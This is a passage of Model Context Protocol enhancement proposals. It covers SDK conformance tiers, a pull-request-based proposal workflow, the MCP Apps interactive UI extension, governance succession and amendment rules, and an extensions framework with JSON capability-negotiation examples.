* No stable release requirement
* May focus on specific use cases or experimental features
* No timeline commitments for updates
* Suitable for niche implementations that may remain at this tier
### Conformance Testing
All SDKs must undergo conformance testing using protocol trace validation: for details see [Conformance Testing RFC (forthcoming)](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1627). This SEP is not focusing on Conformance testing. For the initial version of tiering, we will go with the simplified version where we would have an Example server for each SDK and run simplified conformance tests against those.
```mermaid theme={null}
sequenceDiagram
participant SDK
participant Test Suite
participant Validator
Test Suite->>SDK: Execute test scenario
SDK->>Test Suite: Protocol messages
Test Suite->>Validator: Submit trace
Validator->>Test Suite: Compliance report
Test Suite->>SDK: Pass/Fail result
```
**Compliance Scoring:**
* SDKs receive a percentage score based on test results
* Scores can be displayed as badges (e.g., "90% MCP Compliant")
* Tier 1: 100% compliance required
* Tier 2: 80% compliance required
* Tier 3: No minimum requirement
### Tier Advancement Process
1. **Self-Assessment:** Maintainers evaluate their SDK against tier criteria
2. **Application:** Submit tier advancement request with evidence
3. **Review:** Community review period (2 weeks)
4. **Validation:** Automated conformance testing, github stats on issues
5. **Decision:** Tier assignment by MCP maintainers
### Tier Relegation Process
1. **Auto validation:**
1. compliance tests continuously not passing for four week for Tier 1
2. 20% of compliance tests continuously not passing for four week for Tier 2
2. Issues:
1. Issues are not addressed within two months
### Requirements matrix
| Feature | SDK A | SDK B | SDK C |
| :------------------------------------------------ | :------ | :------- | :----- |
| **Protocol Features support (Conformance tests)** | 85% | 60%% | 100% |
| **GitHub support stats** | 10 days | 100 days | 5 days |
| **Documentation (self reported)** | Good | Minimal | Good |
| **Tier (computed from above)** | Tier 2 | Tier 3 | Tier 1 |
## Rationale
### Why Three Tiers?
* **Tier 1** ensures users have well supported, fully-featured SDK
* **Tier 2** provides a clear pathway for improving SDKs
* **Tier 3** allows experimentation without creating barriers to entry
### Why Time-Based Commitments?
While the community raised concerns about rigid timelines, they provide:
* Clear expectations for users
* Measurable goals for maintainers
* Flexibility through tier progression
### Why Not Just Feature Matrices?
Feature matrices alone don't communicate:
* Maintenance commitment
* Quality standards
* Support expectations
The tiering system combines feature support with quality guarantees.
## Alternatives Considered
### 1. Feature Matrix Only
**Rejected because:** Doesn't communicate maintenance commitments or quality standards
### 2. Percentage-Based Scoring
**Rejected because:** Too granular and doesn't capture qualitative aspects like support
### 3. Properties-Based System
**Rejected because:** Multiple overlapping properties could confuse users
### 4. Latest Version Listing Only
**Rejected because:** Simply listing "supports MCP date" fails to capture critical information:
* Version support may be incomplete (e.g., supports \ except OAuth)
* No indication of maintenance commitment or issue response times
* Lacks information about security patch timelines
* Doesn't communicate dependency update policies
* Version numbers alone don't indicate production readiness
### 5. No Formal System
**Rejected because:** Current ad-hoc approach creates uncertainty for users
## Backward Compatibility
This proposal introduces a new classification system with no breaking changes:
* Existing SDKs continue to function
* Classification is opt-in initially
* Grace period for existing SDKs to achieve tier status
## Security Implications
* Tier 1 SDKs must address security issues within 7 days
* All tiers encouraged to follow security best practices
* Conformance tests include security validation
## Implementation Plan
* [ ] Finalize simplified conformance test suite - Nov 4, 2025
* [ ] SDK maintainers self-assess and apply for tiers - Nov 14, 2025
* [ ] Initial tier assignments - before the November spec release
* [ ] Implement full compliance tests
* [ ] Implement automatic issue tracking analysis for SDKs
## Community Impact
### SDK Maintainers
* Clear goals for improvement
* Recognition for quality implementations
* Structured pathway for advancement
### SDK Users
* Informed selection of SDKs
* Clear expectations for support
* Confidence in tier 1 implementations
### Ecosystem
* Improved overall SDK quality
* Standardized feature support
* Healthy competition between implementations
## References
* [SDK Maintainer Meeting Notes (#1648)](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1648)
* [SDK Harmonization Goals (#1444)](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1444)
* [Conformance Testing SEP (DRAFT)](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1627)
## Appendix
### Simplified conformance tests
While we are working on a [comprehensive proposal for conformance testing](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1627) which will take some time to implement, we want to move forward with at least some automated way to check if SDK has a full set of features. We will start from Servers features set, as we have many more servers than clients and the vast majority of developers using SDKs are Server implementers.
The most straightforward approach is to have an Example Server for each SDK, similar to to [Everything Server](https://github.com/modelcontextprotocol/servers/tree/main/src/everything). Then we will have Conformance Test Client with all the test cases we want to be able to test, for example:
* execute “hello world” tool
* Get prompt
* Get completion
* Get resource template
* Receive notifications
**What is needed form SDKs maintainers:** implement everything server based on a spec. Spec will look like:
* Tool “say\_hello” to return simple text
* Tool “show\_image” to return and image
* Tool “tool\_with\_logging” to return structured output in a format \<> and log three events: start, process, end
* Tool "tool\_with\_notifications" to return structured output in a format \<> and have two notifications \<>
Given well defined spec for the server and SDK documentation, it should be easy to implement it with the help of any coding agent. We want to check it into each SDKs repo as it will serve as an example for server implementers.
Once each SDK has an Everything server, we will run the Conformance Test Client against it.
# SEP-1850: PR-Based SEP Workflow
Source: https://modelcontextprotocol.io/community/seps/1850-pr-based-sep-workflow
PR-Based SEP Workflow
Final
Process
| Field | Value |
| ------------- | ------------------------------------------------------------------------------------------------------------------ |
| **SEP** | 1850 |
| **Title** | PR-Based SEP Workflow |
| **Status** | Final |
| **Type** | Process |
| **Created** | 2025-11-20 |
| **Accepted** | 2025-11-28, 8 Yes, 0 No, 0 Absent per vote in Discord. |
| **Author(s)** | Nick Cooper ([@nickcoai](https://github.com/nickcoai)), David Soria Parra ([@davidsp](https://github.com/davidsp)) |
| **Sponsor** | David Soria Parra ([@davidsp](https://github.com/davidsp)) |
| **PR** | [#1850](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1850) |
***
## Abstract
This SEP formalizes the pull request-based SEP workflow that stores proposals as markdown files in the `seps/` directory of the Model Context Protocol specification repository. The workflow assigns SEP numbers from pull request numbers, maintains version history in Git, and replaces the previous GitHub Issues-based process. This establishes a file-based approach as the canonical way to author, review, and accept SEPs.
## Motivation
The issue-based SEP process introduced several challenges:
* **Dispersed content**: Proposal content was scattered across GitHub issues, linked documents, and pull requests, making review and archival difficult.
* **Difficult collaboration**: Maintaining long-form specifications in issue bodies made iterative edits and multi-contributor collaboration harder.
* **Limited version control**: GitHub issues don't provide the same version control capabilities as Git-managed files.
* **Unclear status management**: The process lacked clear mechanisms for tracking status transitions and ensuring consistency between different sources of truth.
A file-based workflow addresses these issues by:
* Keeping every SEP in version control alongside the specification itself
* Providing Git's built-in review tooling, history, and searchability
* Linking SEP numbers to pull requests to eliminate manual bookkeeping
* Surfacing all discussion in the pull request thread
* Using PR labels in conjunction with file status for better discoverability
## Specification
### 1. Canonical Location
* Every SEP lives in `seps/{NUMBER}-{slug}.md` in the specification repository
* The SEP number is always the pull request number that introduces the SEP file
* The `seps/` directory serves as the single source of truth for all SEPs
### 2. Author Workflow
1. **Draft the proposal** in `seps/0000-{slug}.md` using `0000` as a placeholder number
2. **Open a pull request** containing the draft SEP and any supporting materials
3. **Request a sponsor** from the Maintainers list; tag potential sponsors from [MAINTAINERS.md](https://github.com/modelcontextprotocol/modelcontextprotocol/blob/main/MAINTAINERS.md)
4. **After the PR number is known**, amend the commit to rename the file to `{PR-number}-{slug}.md` and update the header (`SEP-{PR-number}` and `PR: #{PR-number}`)
5. **Wait for sponsor assignment**: Once a sponsor agrees, they will assign themselves and update the status to `Draft`
### 3. Sponsor Responsibilities
A Sponsor is a Core Maintainer or Maintainer who champions the SEP through the review process. The sponsor's responsibilities include:
* **Reviewing the proposal** and providing constructive feedback
* **Requesting changes** based on community input
* **Managing status transitions** by:
* Ensuring that the `Status` field in the SEP markdown file is accurate
* Applying matching PR labels to keep them in sync with the file status
* Communicating status changes via PR comments
* **Initiating formal review** when the SEP is ready (moving from `Draft` to `In-Review`)
* **Raising to Core-Maintainers** ensuring the SEP is presented at the Core Maintainer meeting and that author and sponsor present.
* **Ensuring quality standards** are met before advancing the proposal
* **Tracking implementation** progress and ensuring reference implementations are complete before `Final` status
### 4. Review Flow
Status progression follows: `Draft → In-Review → Accepted → Final`
Additional terminal states: `Rejected`, `Withdrawn`, `Superseded`, `Dormant`
**Dormant status**: If a SEP does not find a sponsor within six months, Core Maintainers may close the PR and mark the SEP as `dormant`.
Reference implementations must be tracked via linked pull requests or issues and must be complete before marking a SEP as `Final`.
### 5. Documentation
* `docs/community/sep-guidelines.mdx` serves as the contributor-facing instructions
* `seps/README.md` provides the concise reference for formatting, naming, sponsor responsibilities, and acceptance criteria
* Both documents must reflect this workflow and be kept in sync
### 6. SEP File Structure
Each SEP must include:
```markdown theme={null}
# SEP-{NUMBER}: {Title}
- **Status**: Draft | In-Review | Accepted | Rejected | Withdrawn | Final | Superseded | Dormant
- **Type**: Standards Track | Informational | Process
- **Created**: YYYY-MM-DD
- **Author(s)**: Name (@github-username)
- **Sponsor**: @github-username (or "None" if seeking sponsor)
- **PR**: https://github.com/modelcontextprotocol/specification/pull/{NUMBER}
## Abstract
## Motivation
## Specification
## Rationale
## Backward Compatibility
## Security Implications
## Reference Implementation
```
### 7. Status Management via PR Labels
To improve discoverability and filtering:
* Sponsors must apply PR labels that match the SEP status (`draft`, `in-review`, `accepted`, `final`, etc.)
* Both the markdown `Status` field and PR labels should be kept in sync
* The markdown file serves as the canonical record (versioned with the proposal)
* PR labels enable easy filtering and searching for SEPs by status
* Only sponsors should modify status fields and labels; authors should request changes through their sponsor
### 8. Legacy Considerations
* Contributors may optionally open a GitHub Issue for early discussion, but the authoritative SEP text lives in `seps/`
* Issues should link to the relevant file once a pull request exists
* SEP numbers are derived from PR numbers, not issue numbers
## Rationale
### Why File-Based?
Storing SEPs as files keeps authoritative specs versioned with the code, mirroring successful processes used by PEPs (Python Enhancement Proposals) and other standards bodies. This approach:
* Provides built-in version control via Git
* Enables standard code review workflows
* Maintains clear history of all changes
* Supports multi-contributor collaboration
* Integrates naturally with the specification repository
### Why PR Numbers?
Using pull request numbers:
* Eliminates race conditions around manual numbering
* Creates natural traceability between proposal and discussion
* Prevents number conflicts
* Simplifies the contribution process
* Maintains a single discussion thread for review
### Why PR Labels?
Adding PR labels alongside the file status:
* Enables quick filtering of SEPs by status without opening files
* Provides immediate visibility of SEP states in PR lists
* Supports GitHub's search and filter capabilities
* Complements the canonical markdown status field
* Reduces friction for maintainers managing multiple SEPs
### Making This the Primary Process
Maintaining two overlapping canonical processes risked divergence and created confusion for contributors. Establishing the file-based approach as the primary method:
* Reduces cognitive overhead for new contributors
* Ensures consistency in the SEP corpus
* Simplifies maintenance for sponsors
* Aligns with industry best practices
## Backward Compatibility
* Existing issue-based SEPs remain valid and require no migration
* Historical GitHub Issue links continue to work
* Future SEPs should reference the new file locations in `seps/`
* Maintainers may optionally backfill historical SEPs into `seps/` for archival purposes
## Security Implications
No new security considerations beyond the standard code review process for pull requests.
## Reference Implementation
* This pull request (#1850) implements the canonical instructions in both `seps/README.md` and `docs/community/sep-guidelines.mdx`
* The process has been updated to reflect the PR-based workflow with status management via labels
* This SEP document itself serves as an example of the new format
# Vote
This SEP was accepted unanimously by the MCP Core Maintainers with a vote of 8 yes's, 0 no's and 0 absent votes on Friday December 28th, 2025 in a Discord poll.
# SEP-1865: MCP Apps - Interactive User Interfaces for MCP
Source: https://modelcontextprotocol.io/community/seps/1865-mcp-apps-interactive-user-interfaces-for-mcp
MCP Apps - Interactive User Interfaces for MCP
Final
Extensions Track
| Field | Value |
| ------------- | --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| **SEP** | 1865 |
| **Title** | MCP Apps - Interactive User Interfaces for MCP |
| **Status** | Final |
| **Type** | Extensions Track |
| **Created** | 2025-11-21 |
| **Author(s)** | Ido Salomon ([@idosal](https://github.com/idosal)), Liad Yosef ([@liadyosef](https://github.com/liadyosef)), Olivier Chafik ([@olivierchafik](https://github.com/olivierchafik)), |
| **Sponsor** | None (seeking sponsor) |
| **PR** | [#1865](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/1865) |
***
## Abstract
This SEP proposes an extension to MCP (per SEP-1724) that enables servers to deliver interactive
user interfaces to hosts. MCP Apps introduces a standardized pattern for declaring UI resources via
the `ui://` URI scheme, associating them with tools through metadata, and facilitating
bi-directional communication between the UI and the host using MCP's JSON-RPC base protocol. This
extension addresses the growing community need for rich, interactive experiences in MCP-enabled
applications, maintaining security, auditability, and alignment with MCP's core architecture. The
initial specification focuses on HTML resources (`text/html;profile=mcp-app`) with a clear path for
future extensions.
## Motivation
MCP lacks a standardized way for servers to deliver rich, interactive user interfaces to hosts.
This gap blocks many use cases that require visual presentation and interactivity that go beyond
plain text or structured data. As more hosts adopt this capability, the risk of fragmentation and
interoperability challenges grows.
[MCP-UI](https://mcpui.dev/) has demonstrated the viability and value of MCP apps built on UI
resources and serves as a community playground for the UI spec and SDK. Fueled by a dedicated
community, it developed the bi-directional communication model and the HTML, external URL, and
remote DOM content types. MCP-UI's adopters, including hosts and providers such as Postman,
HuggingFace, Shopify, Goose, and ElevenLabs, have provided critical insights and contributions to
the community.
OpenAI's [Apps SDK](https://developers.openai.com/apps-sdk/), launched in November 2025, further
validated the demand for rich UI experiences within conversational AI interfaces. The Apps SDK
enables developers to build rich, interactive applications inside ChatGPT using MCP as its
backbone.
The architecture of both the Apps SDK and MCP-UI has significantly informed the design of this
specification.
However, without formal standardization:
* Servers cannot reliably expect UI support via MCP
* Each host may implement slightly different behaviors
* Security and auditability patterns are inconsistent
* Developers must maintain separate implementations or adapters for different hosts (e.g., MCP-UI
vs. Apps SDK)
This SEP addresses the current limitations through an optional, backwards-compatible extension that
unifies the approaches pioneered by MCP-UI and the Apps SDK into a single, open standard.
## Specification
The full specification can be found at
[modelcontextprotocol/ext-apps](https://github.com/modelcontextprotocol/ext-apps/blob/main/specification/draft/apps.mdx).
At a high level, MCP Apps extends the Model Context Protocol to enable servers to deliver
interactive user interfaces to hosts. This extension introduces:
* **UI Resources:** Predeclared resources using the `ui://` URI scheme
* **Resource Discovery:** Tools reference UI resources via metadata
* **Bi-directional Communication:** UI iframes communicate with hosts using standard MCP JSON-RPC
protocol
* **Security Model:** Mandatory iframe sandboxing with auditable communication
This specification focuses on HTML content (`text/html;profile=mcp-app`) as the initial content
type, with extensibility for future formats.
As an extension, MCP Apps is optional and must be explicitly negotiated between clients and servers
through the extension capabilities mechanism (see Capability Negotiation section in the
[full specification](https://github.com/modelcontextprotocol/ext-apps/blob/main/specification/draft/apps.mdx)).
## Rationale
### Predeclared resources vs. inline embedding
UI is modeled as predeclared resources (`ui://`), referenced by tools via metadata. This allows:
* Hosts to prefetch templates before tool execution, improving performance
* Separation of presentation (template) from data (tool results), facilitating caching
* Security review of UI resources
**Alternatives considered:**
* **Embedded resources:** Current MCP-UI approach, where resources are returned in tool results.
Although it's more convenient for server development, it was deferred due to the gaps in
performance optimization and the challenges in the UI review process.
* **Resource links:** Predeclare the resources but return links in tool results. Deferred due to
the gaps in performance optimization.
### Reusing MCP JSON-RPC instead of a custom protocol
Reuses existing MCP infrastructure (type definitions, SDKs, etc.). JSON-RPC offers advanced
capabilities (timeouts, errors, etc.).
**Alternatives considered:**
* **Custom message protocol:** Current MCP-UI approach with message types like tool, intent,
prompt, etc. These message types can be translated to a subset of the proposed JSON-RPC messages.
* **Global API object:** Rejected because it requires host-specific injection and doesn't work with
external iframe sources. Syntactic sugar may still be added on the server/UI side.
### HTML-only MVP
* HTML is universally supported and well-understood
* Simplest security model (standard iframe sandbox)
* Allows screenshot/preview generation (e.g., via html2canvas)
* Sufficient for most observed use cases
* Provides a clear baseline for future extensions
**Alternatives considered:**
* **Include external URLs in MVP:** This is one of the easiest content types for servers to adopt,
as it's possible to embed regular apps. However, it was deferred due to concerns around model
visibility, inability to screenshot content, and review process. It may effectively be supported
with the SEP's new `externalIframes` capability.
## Backward Compatibility
The proposal is an optional extension to the core protocol. Existing implementations continue
working without changes.
## Security Implications
Hosting interactive UI content from potentially untrusted MCP servers requires careful security
consideration.
Based on the threat model, MCP Apps proposes the following mitigations:
* **Iframe sandboxing**: All UI content runs in sandboxed iframes with restricted permissions
* **Predeclared templates**: Hosts can review HTML content before rendering
* **Auditable messages**: All UI-to-host communication goes through loggable JSON-RPC
* **User consent**: Hosts can require explicit approval for UI-initiated tool calls
A full threat model analysis and mitigations are available in the
[full specification](https://github.com/modelcontextprotocol/ext-apps/blob/main/specification/draft/apps.mdx).
## Reference Implementation
* [MCP-UI](https://github.com/idosal/mcp-ui) client and server SDKs support the patterns proposed
in this spec.
* [ext-apps](https://github.com/modelcontextprotocol/ext-apps) repository contains a prototype
implementation by Olivier Chafik.
# SEP-2085: Governance Succession and Amendment Procedures
Source: https://modelcontextprotocol.io/community/seps/2085-governance-succession-and-amendment
Governance Succession and Amendment Procedures
Final
Process
| Field | Value |
| ------------- | ------------------------------------------------------------------------------- |
| **SEP** | 2085 |
| **Title** | Governance Succession and Amendment Procedures |
| **Status** | Final |
| **Type** | Process |
| **Created** | 2025-12-05 |
| **Author(s)** | David Soria Parra ([@dsp-ant](https://github.com/dsp-ant)) |
| **Sponsor** | David Soria Parra ([@dsp-ant](https://github.com/dsp-ant)) |
| **PR** | [#2085](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/2085) |
***
## Abstract
This SEP establishes formal procedures for Lead Maintainer succession and governance amendment within the Model Context Protocol project. It defines clear processes for leadership transitions when a Lead Maintainer leaves their role and establishes requirements for proposing and approving changes to the governance structure itself.
## Motivation
The current MCP governance structure defines roles and responsibilities but lacks explicit procedures for two critical scenarios:
1. **Leadership Succession**: The governance document identifies Justin Spahr-Summers and David Soria Parra as Lead Maintainers (BDFLs) but does not specify what happens if one or both leave their roles. Without a defined succession process, an unexpected departure could create uncertainty about project leadership and decision-making authority.
2. **Governance Evolution**: As the MCP project grows and the community evolves, the governance structure may need to adapt. Currently, there is no defined process for how the governance document itself can be amended, which could lead to ad-hoc changes without proper community input or unclear authority for making such changes.
Establishing these procedures now, while the project leadership is stable, ensures continuity and provides clear guidance for future scenarios.
## Specification
The following sections shall be added to the MCP Governance document.
### Succession
If a Lead Maintainer leaves their role for any reason, the succession process begins upon their written notice or, if unable to provide notice, upon a determination by the remaining Lead Maintainer(s) or Core Maintainers that the Lead Maintainer is unable to continue serving.
If one or more Lead Maintainer(s) remain, they shall appoint a successor (by majority vote if multiple), and the remaining Lead Maintainer(s) will continue to govern until a successor is appointed.
If no Lead Maintainers remain, the Core Maintainers shall appoint a successor by majority vote within 30 days, and the project operates by two-thirds vote of Core Maintainers until a new Lead Maintainer is appointed.
### Amendment
Amendments to this governance structure may only be proposed by Lead Maintainers. Any proposed amendment must be approved by a two-thirds (2/3) majority of all Core Maintainers to take effect.
Amendment proposals shall:
1. Be submitted in writing with clear rationale for the proposed change
2. Include specific language describing the modification to existing governance provisions
3. Allow for a minimum comment period of five (5) days before voting
4. Be decided by recorded vote of Core Maintainers
## Rationale
### Succession Process Design
The succession process is designed with several principles in mind:
* **Continuity**: Remaining Lead Maintainers can continue operating and appoint successors without disruption to project governance.
* **Fallback Authority**: If all Lead Maintainers depart, Core Maintainers have clear authority to select new leadership, preventing a governance vacuum.
* **Time-Bound Process**: The 30-day requirement ensures succession happens promptly while allowing adequate time for deliberation.
* **Supermajority Interim Governance**: Two-thirds voting during interregnum periods ensures major decisions have broad support during transitional periods.
### Amendment Process Design
The amendment process balances stability with adaptability:
* **Lead Maintainer Proposal Authority**: Limiting proposal authority to Lead Maintainers prevents governance churn from frequent amendment proposals while ensuring those with deepest project investment can drive necessary changes.
* **Core Maintainer Approval**: Requiring two-thirds Core Maintainer approval ensures amendments have broad support from those actively governing the project.
* **Comment Period**: The five-day minimum comment period allows affected parties to review and provide input before voting.
* **Recorded Votes**: Transparency in voting ensures accountability and provides a historical record of governance decisions.
### Alternatives Considered
**Succession by Election**: An open election process was considered but rejected as potentially disruptive and slow during critical transition periods. The current proposal allows for quick succession while maintaining checks through the existing maintainer structure.
**Amendment by Any Maintainer**: Allowing any maintainer to propose amendments was considered but could lead to governance instability. The current approach balances stability with the ability to evolve.
**Longer Comment Periods**: Longer comment periods (e.g., 30 days) were considered but deemed excessive for a project that already has regular bi-weekly Core Maintainer meetings. Five days allows for at least one meeting cycle while enabling timely decisions.
## Backward Compatibility
This SEP adds new procedures without modifying existing governance structures. No backward compatibility concerns exist.
## Security Implications
This SEP has no direct security implications. However, clear succession procedures indirectly support security by ensuring continuous responsible stewardship of the project, including security-related decisions.
## Reference Implementation
Upon acceptance, this SEP will be implemented by adding the Succession and Amendment sections to `docs/community/governance.mdx`. The new sections will be inserted after the "Lead Maintainers (BDFL)" section and before the "Decision Process" section.
A draft pull request implementing these changes will be linked here once available.
# SEP-2133: Extensions
Source: https://modelcontextprotocol.io/community/seps/2133-extensions
Extensions
Final
Standards Track
| Field | Value |
| ------------- | ------------------------------------------------------------------------------- |
| **SEP** | 2133 |
| **Title** | Extensions |
| **Status** | Final |
| **Type** | Standards Track |
| **Created** | 2025-01-21 |
| **Author(s)** | Peter Alexander ([@pja-ant](https://github.com/pja-ant)) |
| **Sponsor** | None (seeking sponsor) |
| **PR** | [#2133](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/2133) |
***
## Abstract
This SEP establishes a lightweight framework for extending the Model Context Protocol through optional, composable extensions. This proposal defines a governance model and presentation structure for extensions that allows the MCP ecosystem to evolve while maintaining core protocol stability. Extensions enable experimentation with new capabilities without forcing adoption across all implementations, providing clear extension points for the community to propose, review, and adopt enhanced functionality.
This SEP defines both official extensions (maintained by MCP maintainers) and experimental extensions (an incubation pathway for Working Groups and Interest Groups to prototype and collaborate on extension ideas before formal acceptance). Externally maintained extensions will likely come at a later stage.
## Motivation
MCP currently lacks any form of guidance on how extensions are to be proposed or adopted. Without a process, it is unclear how these extensions are governed, what expectations there are around implementation, how they should be referenced in the specification, etc.
## Specification
### Definition
An MCP extension is an optional addition to the specification that defines capabilities beyond the core protocol. Extensions enable functionality that may be modular (e.g., distinct features like authentication), specialized (e.g., industry-specific logic), or experimental (e.g., features being incubated for potential core inclusion).
Extensions are identified using a unique *extension identifier* with the format: `{vendor-prefix}/{extension-name}`, e.g. `io.modelcontextprotocol/oauth-client-credentials` or `com.example/websocket-transport`. The names follow the same rules as the [\_meta keys](https://modelcontextprotocol.io/specification/draft/basic/index#meta), except that the prefix is mandatory.
To prevent identifier collisions, the vendor prefix SHOULD be a reversed domain name that the extension author owns or controls (similar to Java package naming conventions). For example, a company owning `example.com` would use `com.example/` as their prefix.
Breaking changes MUST use a new identifier, e.g. `io.modelcontextprotocol/oauth-client-credentials-v2`. A breaking change is any modification that would cause existing compliant implementations to fail or behave incorrectly, including: removing or renaming fields, changing field types, altering the semantics of existing behavior, or adding new required fields.
Extensions may have settings that are sent in client/server messages for fine-grained configuration.
This SEP defines *Official Extensions* and *Experimental Extensions*. Experimental extensions are maintained within the MCP organization as an incubation pathway but are not yet officially accepted. *Unofficial extensions* are not recognized by MCP governance and may be introduced and governed by developers outside the MCP organization.
### Official Extensions
Official extensions live inside the MCP github org at [https://github.com/modelcontextprotocol/](https://github.com/modelcontextprotocol/) and are officially developed and recommended by MCP maintainers. Official extensions use the `io.modelcontextprotocol` vendor prefix in their extension identifiers.
An *extension repository* is a repository within the official modelcontextprotocol github org with the `ext-` prefix, e.g. [https://github.com/modelcontextprotocol/ext-auth](https://github.com/modelcontextprotocol/ext-auth).
* Extension repositories are created at the core maintainers discretion with the purpose of grouping extensions in a specific area (e.g. auth, transport, financial services).
* A repository has a set of maintainers (identified by MAINTAINERS.md) appointed by the core maintainers that are responsible for the repository and extensions within it (e.g. [ext-auth MAINTAINERS.md](https://github.com/modelcontextprotocol/ext-auth/blob/main/MAINTAINERS.md), [ext-apps MAINTAINERS.md](https://github.com/modelcontextprotocol/ext-apps/blob/main/MAINTAINERS.md)).
* Extensions SHOULD have an associated working group or interest group to guide their development and gather community input.
An *extension* is a versioned specification document within an extension repository, e.g. [https://github.com/modelcontextprotocol/ext-auth/blob/main/specification/draft/oauth-client-credentials.mdx](https://github.com/modelcontextprotocol/ext-auth/blob/main/specification/draft/oauth-client-credentials.mdx)
* Extension specifications MUST use the same language as the core specification (i.e. \[[BCP 14](https://www.rfc-editor.org/info/bcp14)] \[[RFC2119](https://datatracker.ietf.org/doc/html/rfc2119)] \[[RFC8174](https://datatracker.ietf.org/doc/html/rfc8174)]) and SHOULD be worded as if they were part of the core specification.
While day-to-day governance is delegated to extension repository maintainers, the core maintainers retain ultimate authority over official extensions, including the ability to modify, deprecate, or remove any extension.
### Experimental Extensions
Experimental extensions provide an incubation pathway for Working Groups (WGs) and Interest Groups (IGs) to facilitate discovery, prototype ideas, and collaborate on extension concepts before formal SEP submission. Experimental extensions allow cross-company collaboration under neutral governance with clear anti-trust protection and IP clarity.
An *experimental extension repository* is a repository within the official modelcontextprotocol github org with the `experimental-ext-` prefix, e.g. `https://github.com/modelcontextprotocol/experimental-ext-interceptors`.
* Any maintainer MAY create an experimental extension repository while the associated SEP is still in draft state (or before a SEP has been submitted).
* Experimental extensions MUST be associated with a Working Group or Interest Group, whose maintainers are responsible for day-to-day governance of the repository.
* Experimental extension repositories MUST clearly indicate their experimental/non-official status (e.g., in the README) to avoid confusion with official extensions.
* Any published packages from experimental extensions MUST use naming that clearly indicates their experimental status.
* Core maintainers retain oversight of experimental extension repositories, including the ability to archive or remove them.
To graduate an experimental extension to official status, the standard SEP process (Extensions Track) applies. The experimental repository and any reference implementations developed during incubation MAY be referenced in the SEP to demonstrate the extension's practicality.
### Lifecycle
#### Creation
Extensions MAY optionally begin as experimental extensions (see *Experimental Extensions* section) to facilitate prototyping and collaboration before formal submission. This incubation period is encouraged but not required.
To become an official extension, extensions are created via a SEP in the [main MCP repository](https://github.com/modelcontextprotocol/modelcontextprotocol/) using the [standard SEP guidelines](https://modelcontextprotocol.io/community/sep-guidelines) but with a new type: **Extensions Track**. This type follows the same review and acceptance process as Standards Track SEPs, but clearly indicates that the proposal is for an extension rather than a core protocol addition. The SEP must identify the Working Group and Extension Maintainers that will be responsible for the extension. See [SEP-2148](https://github.com/modelcontextprotocol/modelcontextprotocol/pull/2148) for how maintainers are appointed.
Extension SEPs:
* SHOULD be discussed and iterated on in a relevant working group prior to submission.
* MUST have at least one reference implementation in an official SDK prior to review to ensure the extension is practical and implementable.
* MAY reference an existing experimental extension repository and implementations developed during incubation.
* Will be reviewed by the Core Maintainers, who have the final authority over its inclusion as an Official Extension.
Once approved, the author SHOULD produce a PR that introduces the extension to the extension repository and reference in the main spec (see *Spec Recommendation* section). Approved extensions MAY be implemented in additional clients / servers / SDKs (see *SDK Implementation*).
#### Iteration
Once accepted, extensions may be iterated on without further review from the Core Maintainers. The extension repository maintainers are responsible for the review and acceptance of changes to an extension and SHOULD coordinate change via the relevant working group(s). As extensions are independent of the core protocol, extensions may be updated and deployed at any time, but changes MUST ensure they account for backwards compatibility in their design.
#### Promotion to Core Protocol (Optional)
Eventually, some extensions MAY transition to being core protocol features. This SHOULD be treated as a Standards Track SEP with separate core maintainer review. Note that not all extensions are suitable for inclusion in the core protocol (e.g. those specific to an industry) and may remain as extensions indefinitely.
### Spec Recommendation
Extensions will be referenced from a new page on the MCP website at [modelcontextprotocol.io/extensions](http://modelcontextprotocol.io/extensions) (to be created) with links to their specification.
Links to relevant extensions MAY also be added to the core specification as appropriate (e.g. [https://modelcontextprotocol.io/specification/draft/basic/authorization](https://modelcontextprotocol.io/specification/draft/basic/authorization) may link to ext-auth extensions), but they MUST be clearly advertised as optional extensions and SHOULD be links only (not copies of specification text).
### SDK Implementation
SDKs MAY implement extensions. Where implemented, extensions MUST be disabled by default and require explicit opt-in. SDK documentation SHOULD list supported extensions.
SDK maintainers have full autonomy over extension support in their SDKs:
* Maintainers are solely responsible for the implementation and maintenance of any extensions they choose to support.
* Maintainers are under no obligation to implement any extension or accept contributed implementations. Extension support is not required for 100% protocol conformance or the upcoming SDK conformance tiers.
* This SEP does not prescribe how SDKs should structure or package extensions. Maintainers may provide extension points, plugin systems, or any other mechanism they see fit.
### Evolution
All extensions evolve **independently** of the core protocol, i.e. a new version of an extension MAY be published without review by the core maintainers. Minor updates, bug fixes, and non-breaking enhancements to an extension do not require a new SEP; these changes are managed by the extension repository maintainers.
Extensions SHOULD be versioned, but exact versioning approach is not specified here.
### Negotiation
Clients and servers advertise their support for extensions in the [ClientCapabilities](https://modelcontextprotocol.io/specification/2025-06-18/schema#clientcapabilities) and [ServerCapabilities](https://modelcontextprotocol.io/specification/2025-06-18/schema#servercapabilities) fields respectively, and in the [Server Card](https://github.com/modelcontextprotocol/modelcontextprotocol/issues/1649) (currently in progress).
A new "extensions" field will be introduced to each that is a map of *extension identifiers* to per-extension settings objects. Each extension specifies the schema of its settings object; an empty object indicates no settings.
#### Client Capabilities
Clients advertise extension support in the `initialize` request:
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"method": "initialize",
"params": {
"protocolVersion": "2025-06-18",
"capabilities": {
"roots": {
"listChanged": true
},
"extensions": {
"io.modelcontextprotocol/ui": {
"mimeTypes": ["text/html;profile=mcp-app"]
}
}
},
"clientInfo": {
"name": "ExampleClient",
"version": "1.0.0"
}
}
}
```
#### Server Capabilities
Servers advertise extension support in the `initialize` response:
```json theme={null}
{
"jsonrpc": "2.0",
"id": 1,
"result": {
"protocolVersion": "2025-06-18",
"capabilities": {
"tools": {},
"extensions": {
"io.modelcontextprotocol/ui": {}
}
},
"serverInfo": {
"name": "ExampleServer",
"version": "1.0.0"
}
}
}
```
#### Server-Side Capability Checking
Servers SHOULD check client capabilities before offering extension-specific features:
```typescript theme={null}
const hasUISupport = clientCapabilities?.extensions?.[
"io.modelcontextprotocol/ui"
]?.mimeTypes?.includes("text/html;profile=mcp-app");
